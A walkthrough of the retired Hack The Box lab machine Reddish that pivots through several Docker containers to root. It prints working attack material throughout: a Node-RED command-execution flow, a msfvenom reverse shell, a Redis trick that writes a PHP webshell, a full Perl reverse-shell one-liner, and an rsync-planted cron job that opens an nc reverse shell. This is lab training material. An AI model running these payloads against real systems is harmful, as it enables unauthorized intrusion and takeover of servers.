This post documents the complete walkthrough of Reddish, a retired vulnerable VM created by yuntao, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.


Information Gathering

Let’s start with an nmap scan to establish the available services on the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt
1880/tcp open  http    syn-ack ttl 62 Node.js Express framework
|_http-favicon: Unknown favicon MD5: 818DD6AFD0D0F9433B21774F89665EEA
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-title: Error

Since I can’t GET, let’s try POST.


Nice! Let’s follow the hint from the output above.

Node-RED allows command execution. Import the following flow into Node-RED and you should see something like this.

[{"id":"30fa9bc2.3414cc","type":"tcp in","z":"506564e3.6cef04","name":"","server":"client","host":"","port":"1234","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":120,"y":80,"wires":[["cc2b2fad.f52d6"]]},{"id":"4f71ce1a.fc7078","type":"tcp out","z":"506564e3.6cef04","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":650,"y":80,"wires":[]},{"id":"cc2b2fad.f52d6","type":"exec","z":"506564e3.6cef04","command":"/bin/bash -c","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":410,"y":160,"wires":[["4f71ce1a.fc7078"],["4f71ce1a.fc7078"],[]]}]

Here, I’m running a reverse shell flow that executes /bin/bash -c and returns stdout and stderr to me. And because it’s running under the context of /bin/bash -c, commands with spaces have to be enclosed in quotes.
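To see why the quoting matters, here’s a quick local demonstration with nothing box-specific:

```shell
# Unquoted: only the first word becomes the -c script; "hello" is just $0.
/bin/bash -c echo hello        # prints an empty line
# Quoted: the whole string is parsed and executed as one command.
/bin/bash -c 'echo hello'      # prints: hello
```

The exec node passes its payload to /bin/bash -c the same way, so an unquoted payload silently loses everything after the first word.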

Bummer, I know.

That’s why I spun up another reverse shell with msfvenom.

# msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=9999 -f elf -o rev

Next, I have to find a more efficient way of transferring files over to the remote target. To that end, I wrote a wget utility in Node.js, since node and the request module are available. The script takes two arguments: the first is the download URL and the second is the path to save the file to.

const fs = require('fs');
const request = require('request');

// usage: node wget.js <url> <path>
var args = process.argv.slice(2);
var url = args[0];
var location = args[1];

// stream the response body straight to disk
request(url).pipe(fs.createWriteStream(location));


Long story short, I transferred over the base64-encoded string of wget.js and reversed the process like so.
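The round trip looks roughly like this (filenames are illustrative; a stand-in string takes the place of the real script):

```shell
# Attacking machine: produce the base64 blob of the script.
printf 'console.log("demo");' > /tmp/wget-demo.js    # stand-in for the real wget.js
base64 < /tmp/wget-demo.js > /tmp/wget.b64
# Remote target: paste the blob in and reverse the process.
base64 -d < /tmp/wget.b64 > /tmp/wget-out.js
```

In practice the blob is copied through the shell by hand, so the decode step is just `echo '<blob>' | base64 -d > /tmp/wget.js` on the target.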

Now I have a better shell and root, only to realize that Node-RED is running inside a Docker container!

Exploring the docker container, I realized that there might be other containers around!

Look at that. My first guess is that there are probably two more containers, one on each of the other subnets, because the first address on each subnet likely belongs to the host.

And because the docker container is lacking in the network reconnaissance department, I had to transfer nc over to act as a no-frills port scanner, leveraging the zero-I/O mode in nc.

With nc, I can perform rudimentary port scans to my liking.
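A minimal sketch of such a scan — the address and port list are placeholders for what the earlier network reconnaissance turned up; -z is zero-I/O mode, -w sets the timeout:

```shell
# Probe a few likely ports; 127.0.0.1 stands in for the neighboring
# container's IP discovered during enumeration.
for p in 80 1880 6379; do
  nc -z -w 1 127.0.0.1 "$p" 2>/dev/null && echo "port $p open"
done
true  # the loop succeeds even when every port is closed
```

Zero-I/O mode makes nc connect and immediately close, which is all a port scan needs.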

Next, let’s transfer over dbclient, the Dropbear SSH client, a drop-in replacement for ssh with a small footprint. dbclient allows us to forward remote ports to my attacking machine through an SSH tunnel. The instructions to statically compile dbclient are beyond the scope of this write-up.

While we are at it, let’s transfer a statically compiled socat as well. Now, start the SSH server on my attacking machine. Note that I’ve allowed root login with PermitRootLogin yes.

# systemctl start ssh

Forward the remote ports to my attacking machine like so.

# ssh -R … root@… -f -N
# ssh -R … root@… -f -N

Now, I can access these docker containers!

Next Container: www

Looks like we have hints in the HTML source.

If I have to guess, I would say that the www container and the redis container are sharing /var/www/html. Another piece of technology that will aid us is PHP.

If that’s the case, then I can do something like this since I also have access to the redis container:

  1. Set dir to /var/www/html.
  2. Set dbfilename to cmd.php.
  3. Set a key with PHP code that allows remote command execution.
  4. Save the snapshot.
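The steps above can be sketched as a command file to replay with redis-cli; the exact PHP payload and the connection details are my assumptions, not taken from the original session:

```shell
# Write the command sequence we want to replay against the redis container.
cat > /tmp/redis-webshell.txt <<'EOF'
config set dir /var/www/html
config set dbfilename cmd.php
set payload "<?php system($_REQUEST['cmd']); ?>"
save
EOF
# Then replay it through the tunnel, e.g.:
#   redis-cli -h 127.0.0.1 -p 6379 < /tmp/redis-webshell.txt
```

The saved RDB snapshot wraps the value in binary framing, but PHP skips the surrounding garbage and executes the embedded `<?php … ?>` tag when cmd.php is requested.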

Awesome. It works!

I prefer to use Perl as the reverse shell because it’s always available, even in containers. :grin:

Before we do that, we need to set up another TCP tunnel between nodered and my attacking machine to facilitate data shuffling between the www container and my attacking machine.

This is what the Perl reverse shell looks like before URL encoding:

perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Encode it to prevent complications.
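One way to do the encoding on the attacking machine — python3 is assumed to be available; any URL-encoder works:

```shell
# URL-encode arbitrary stdin so quotes, spaces, and semicolons survive
# being sent as an HTTP parameter.
urlencode() {
  python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.stdin.read()))'
}
printf '%s' 'perl -e "..."' | urlencode
```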


We have shell into www!

Next Container: backup

We’ll soon realize that www is another multi-homed container.

It’s getting familiar now. Another container probably lives on the newly discovered subnet. Suffice it to say, we need to transfer our beloved nc to www to show some port-scanning love to the new container.

The transfer this time round is more troublesome because the reverse shell truncates the base64-encoded string of nc. Fret not: we can gzip before encoding. This way, we save some space and reduce the number of copy-and-paste round trips needed to move the string over piecemeal.
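The compress-encode-split pipeline looks like this; the chunk size and filenames are arbitrary, and a short string stands in for the real binary:

```shell
# Attacking machine: compress, encode, and split into paste-sized chunks.
printf 'stand-in for the nc binary' > /tmp/nc-demo
gzip -c /tmp/nc-demo | base64 -w 0 > /tmp/nc.b64
rm -f /tmp/chunk.*                      # start clean
split -b 512 /tmp/nc.b64 /tmp/chunk.
# Target: reassemble the chunks, then reverse the encoding and compression.
cat /tmp/chunk.* | base64 -d | gunzip > /tmp/nc-out
```

Each chunk is small enough to paste into the shell without truncation, and the shell glob reassembles them in order.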

It’s not pretty but hey, it works!

What do we have here?

And there’s an rsync client in www!

During enumeration of www, I found the following locations of interest:

  • cron job at /etc/cron.d/backup
  • /dev/sda3 mounted at /home

This is what the cron job looks like.

This is what the mounts look like.

Now I’m pretty sure getting the flags has something to do with the last container.

I’ll not go over what rsync is or how to use it; that’s what the man pages are for. RTFM!

Pivoting on how the cron job is scheduled in www, I found a similar cron job in backup too.

No wonder the database backup doesn’t complete!

We know rsync works both ways: we can copy files from backup, and we can also copy files over to backup. I’ve done my enumerations. :triumph:

Let’s copy two files over: our beloved nc, and a cron job that runs an nc reverse shell back to us. But before we do that, we need to set up a pair of TCP tunnels: one between nodered and www, and one between nodered and my attacking machine. If you have been following the walkthrough so far, you’ll have realized that there’s no socat in www. As such, we also need to transfer socat to www, with the help of nc, of course.

On www, use the following command:

$ /tmp/nc -lnvp 1234 > /tmp/socat &

On nodered, use the following command:

# nc 1234 < /usr/bin/socat &

Now we can set up the tunnels.

On www, use the following command:

$ /tmp/socat tcp-listen:5555,fork tcp: &

On nodered, use the following command:

# socat tcp-listen:5555,fork tcp: &

Now, let’s copy the files over.
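The dropped cron job could look like this — the callback address, the port, and the destination path are assumptions based on the tunnel setup above:

```shell
# Cron entry that calls back through the www tunnel every minute, once
# rsync has placed it under /etc/cron.d/ on backup alongside /tmp/nc.
# <tunnel-ip> is a placeholder for the www-side tunnel endpoint.
cat > /tmp/evil-cron <<'EOF'
* * * * * root /tmp/nc <tunnel-ip> 6666 -e /bin/sh
EOF
# then copy both files over, e.g.:
#   rsync /tmp/nc /tmp/evil-cron rsync://<backup>/src/...   (hypothetical module/path)
```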

A minute later, you’ll receive a root shell on backup.


The backup container, as the name suggests, stores its data on the host. Because of that, we can mount the host’s partitions from within the container. And since we are root in this container, we can read any file on the mounted volumes.
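From the root shell on backup, something along these lines reads the host’s files; the device name and mount point are illustrative, so check the partition list first:

```shell
# List the block devices visible to the container.
cat /proc/partitions
# As root inside the container (illustrative device and paths):
#   mkdir -p /mnt/host && mount /dev/sda1 /mnt/host
#   cat /mnt/host/root/root.txt
```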